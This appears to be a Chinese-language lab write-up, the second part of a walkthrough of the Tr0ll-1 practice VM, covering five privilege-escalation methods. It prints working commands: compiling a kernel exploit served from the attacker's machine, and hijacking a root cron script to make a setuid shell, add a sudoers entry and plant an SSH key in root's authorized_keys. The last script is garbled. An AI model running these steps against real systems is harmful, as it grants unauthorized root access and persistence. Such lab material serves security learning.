4-Tr0ll-1百个靶机渗透（精写-思路为主）（下）

二、提权

1.提权方法1

ssh登录获取bash shell

python -c 'import pty;pty.spawn("/bin/bash")'

内核版本

复制过来

开启网页下载

┌──(root㉿kali)-[~]

└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

┌──(root㉿kali)-[~]

└─# python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

回到靶机ssh，发现断开了，判断应该是设置了定时任务什么的，不太清楚，只能先提权看看了

重新ssh登录

gcc 37292.c -o muma1
./muma1

又断开了，好恶心。

这个常规方法会被cronb定时执行影响，所以我们要尝试更多可能

2.提权方法2

我们查看cronb日志

find / -name cronlog 2>/dev/null ---查看计划任务日志信息

每间隔2分钟执行一次任务

我倒要看看他执行的是什么文件

find / -name cleaner.py 2>/dev/null ---查看文件在哪儿

清除/tmp下的所有文件，并且推出程序

好家伙每两分钟清除/tmp下的所有文件，并且退出当前tty，

那么肯定比我权限都高，我们就用这个执行脚本获取shell

vim写入不了

我们只能用vi或nano写入

find / -perm -o+w -type f 2> /dev/null | grep /proc -v ---枚举所有可写入和执行权限的文件

find / -writable 2>/dev/null ---枚举所有可写入权限的文件

先注释掉这句

这样我们就不会掉了

我们慢慢写

这里要写入要给python远控的脚本

脚本不能直接展示，因为一些大家dddd，可以私信我们的要

此处省略远控代码注入

拿到shell了！

3.提权方法3

我们ssh上去

python -c 'import pty; pty.spawn("/bin/bash")'

创建root可执行程序，获得root权限

nano /lib/log/cleaner.py

#!/usr/bin/python
import os
import sys
try:
    os.system('cp /bin/sh /tmp/ou')
    os.system('chmod u+s /tmp/ou')
except:
    sys.exit()

断开后重新ssh上去看看

获得bash shell

4.提权方法4

或者编辑脚本以将用户溢出添加到sudoers文件中可以sudo su到root用户：

nano /lib/log/cleaner.py

#!/usr/bin/python
import os
import sys
try:
    os.system('echo "overflow ALL=(ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()

sudo su - root 得到root权限

5.root免密登录的方法

在kali本地root的~/.ssh下写入key

cd ~/.ssh

cat id_rsa.pub

没有生成一个

ssh-keygen

空密码

把rsa的key内容写入进靶机的/root/.ssh/里面

cat id_rsa.pub

登入靶机

注意执行这个shell需要

python -c 'import pty; pty.spawn("/bin/bash")'

nano /lib/log/cleaner.py

#!/usr/bin/python import os import sys try: os.system(mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD6jUb2+l9/eqOPZ9fbqx5Q3GMjLeHkxPTzomODJA02yDOzxINVxTVfGey7oae+6CqTJZLobypXXD3sTm3oBUKxZxT7dfKZ09ds1F2GK6MdXXWqLI0FqpBCtbYxO9UNIOD9a26OreHHt5t6/wM4oxf95UqNQDJ1/xAlcXPkpOIUCzBKrRnt59TmJycVAGhyZnyBT6ybgacaQDUoS6ifUzRr5xXTCvDDnSQ0Vu0FepRXf1rB9L7f3gCz7HWEU3AkGVnOEoCwtddaHFPF3r6cO7KzWqwG0aDO4sxdbR0WfLqAoUrI6Vkob0IRkz0ZBkmA7K/Ew2s8E5xH53kRV2fPDa3x1S9/z+nPZDma1yYu4UjoWsIXz5+iYU0dYS8UcolEXFwH4f2zIbvQy1JnTc6NnJ/TDsdUMXmtye5VS36reczIvbbRCTz0k+ZiJAooh2Z53sS4BZQ4Sk3XMokwlDy61JFoDdqflXs3koi+bX05aT+Sc9Pdh2sbNK7WOTqQJyOmceU= root@kali" >> /root/.ssh/authorized_keys) except: sys.exit()

等他计划任务执行

断开了证明执行了

等ssh起来

总结

这里展示了五种提权方法，基本覆盖了常用的内网各种姿势，希望大家学有所成，请不要用于其他渠道。

特别注明：本文章只用于学习交流，不可用来从事违法犯罪活动，如使用者用来从事违法犯罪行为，一切与作者无关。